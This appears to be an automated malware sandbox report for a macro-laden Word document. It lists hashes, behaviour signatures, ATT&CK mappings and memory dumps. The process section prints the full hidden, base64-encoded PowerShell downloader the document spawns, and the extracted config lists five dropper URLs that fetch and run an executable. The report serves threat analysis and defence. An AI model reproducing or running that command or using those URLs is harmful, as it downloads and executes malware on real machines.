Overview

overview

10

Static

static

10

0c5b00311b...5e.exe

windows10-2004-x64

7

1618780b85...13.vbs

windows7-x64

8

1618780b85...13.vbs

windows10-2004-x64

8

31d2bac123...c0.exe

windows7-x64

10

31d2bac123...c0.exe

windows10-2004-x64

10

3e0a6e80d4...1c.xls

windows7-x64

3

3e0a6e80d4...1c.xls

windows10-2004-x64

1

5489a717a2...f8.exe

windows7-x64

10

5489a717a2...f8.exe

windows10-2004-x64

10

63f2e49bd1...c6.msi

windows7-x64

10

63f2e49bd1...c6.msi

windows10-2004-x64

10

719d53c106...d2.exe

windows7-x64

10

719d53c106...d2.exe

windows10-2004-x64

10

8411add8ba...e8.dll

windows7-x64

1

8411add8ba...e8.dll

windows10-2004-x64

1

88b0765750...b0.exe

windows7-x64

10

88b0765750...b0.exe

windows10-2004-x64

10

9cb1756afd...71.exe

windows7-x64

3

9cb1756afd...71.exe

windows10-2004-x64

3

REP_894198...17.doc

windows7-x64

10

REP_894198...17.doc

windows10-2004-x64

10

d472c89510...54.xls

windows7-x64

3

d472c89510...54.xls

windows10-2004-x64

1

dcc72f90c1...21.exe

windows7-x64

10

dcc72f90c1...21.exe

windows10-2004-x64

3

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    02-12-2024 16:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    REP_89419812646634117.doc

  • Size

    245KB

  • MD5

    1d6f0e7e30c1d9e3f64b0d36e602da50

  • SHA1

    895d6dd7f677e45e997b03cef761fc40e10b22ba

  • SHA256

    70b4dbed87a8be890a088d70057ce44413bf3a65df5c5c15d049de0b9c47ff8d

  • SHA512

    1d12056c0d91f07372c7575bec45a608ad21f2509331e4a5d8857ad578c6012557842835a21cbf78882f88df2a214faa7f7a10060cb37489e841b1244ca5e226

  • SSDEEP

    6144:H0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+Bzm8tigOE+wH:H0E3dxtR/iU9mvUPBS8tigOE+w

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://amelano.net/wp-includes/css/dist/2ew/
exe.dropper

http://911concept.com/images/i6ngX5/
exe.dropper

http://ayonschools.com/UBkoqn/
exe.dropper

http://beech.org/wayne/lldo/
exe.dropper

http://firelabo.com/wp-includes/mf6f4/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\REP_89419812646634117.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABXAGgAaAB2AGQAeAByAGIAcQB3AGwAawBmAD0AJwBBAG8AawBqAHMAdgBuAGcAcgBsAGsAZABrACcAOwAkAEQAYQBiAHcAZwByAGwAcwBjAGIAbgB1AGQAIAA9ACAAJwAyADYANwAnADsAJABXAGkAcwBhAGwAeABuAGcAeQBtAHkAawA9ACcASABmAHIAZABhAHoAagB1AG0AYwBqAGIAcAAnADsAJABQAHEAegBvAHEAeABzAGYAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABhAGIAdwBnAHIAbABzAGMAYgBuAHUAZAArACcALgBlAHgAZQAnADsAJABUAGgAdQBwAGEAbwBiAG4AegBuAGMAYgA9ACcARwB3AGMAZwB3AGUAZQBtAGcAZgAnADsAJABSAHQAZwBsAHAAagBiAHUAbAA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAATgBFAFQALgBXAEUAYgBjAGwASQBFAE4AdAA7ACQAWQB6AHUAZABqAGYAbQBrAHkAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAGUAbABhAG4AbwAuAG4AZQB0AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBzAHMALwBkAGkAcwB0AC8AMgBlAHcALwAqAGgAdAB0AHAAOgAvAC8AOQAxADEAYwBvAG4AYwBlAHAAdAAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBpADYAbgBnAFgANQAvACoAaAB0AHQAcAA6AC8ALwBhAHkAbwBuAHMAYwBoAG8AbwBsAHMALgBjAG8AbQAvAFUAQgBrAG8AcQBuAC8AKgBoAHQAdABwADoALwAvAGIAZQBlAGMAaAAuAG8AcgBnAC8AdwBhAHkAbgBlAC8AbABsAGQAbwAvACoAaAB0AHQAcAA6AC8ALwBmAGkAcgBlAGwAYQBiAG8ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AZgA2AGYANAAvACcALgAiAFMAYABQAEwAaQB0ACIAKAAnACoAJwApADsAJABDAHcAcAByAGoAaABjAG8AZQBmAD0AJwBaAGcAZgBzAHIAcQB5AHkAZgBqAGcAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBmAHgAdgBmAHcAdwBvAGMAeQBjAHcAdwAgAGkAbgAgACQAWQB6AHUAZABqAGYAbQBrAHkAKQB7AHQAcgB5AHsAJABSAHQAZwBsAHAAagBiAHUAbAAuACIAZABPAHcAYABOAEwAYABPAGEAZABGAGAAaQBMAEUAIgAoACQAUgBmAHgAdgBmAHcAdwBvAGMAeQBjAHcAdwAsACAAJABQAHEAegBvAHEAeABzAGYAaQApADsAJABUAGcAbgBoAGEAbwBuAHAAbQBlAHgAaQA9ACcAWQBwAGYAYQBzAGcAaABwAHkAbAB1AHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABQAHEAegBvAHEAeABzAGYAaQApAC4AIgBMAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADIANQA4ADUAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAFIAVAAiACgAJABQAHEAegBvAHEAeABzAGYAaQApADsAJABTAHEAawBrAG4AbwB3AGEAdwA9ACcASQBqAHUAYgB2AGoAbQBkAHoAcQBkACcAOwBiAHIAZQBhAGsAOwAkAEEAbwBlAGgAYgBuAGsAaABqAGoAdAA9ACcAWABxAGcAYgBvAGoAdgBjAHkAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAGsAZABlAGQAcABwAGsAeABrAHoAawBvAD0AJwBVAGkAeQBhAGEAbQBpAG0AdwB4ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2100-10-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-29-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-0-0x000000002F3D1000-0x000000002F3D2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2100-5-0x00000000002A0000-0x00000000003A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-6-0x00000000002A0000-0x00000000003A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-7-0x00000000002A0000-0x00000000003A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-11-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-12-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-2-0x0000000070C0D000-0x0000000070C18000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2100-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2100-13-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-8-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-15-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-9-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-28-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2100-24-0x0000000070C0D000-0x0000000070C18000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2100-27-0x00000000002A0000-0x00000000003A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2644-22-0x0000000002010000-0x0000000002018000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2644-21-0x000000001B490000-0x000000001B772000-memory.dmp

      Filesize

      2.9MB

      Download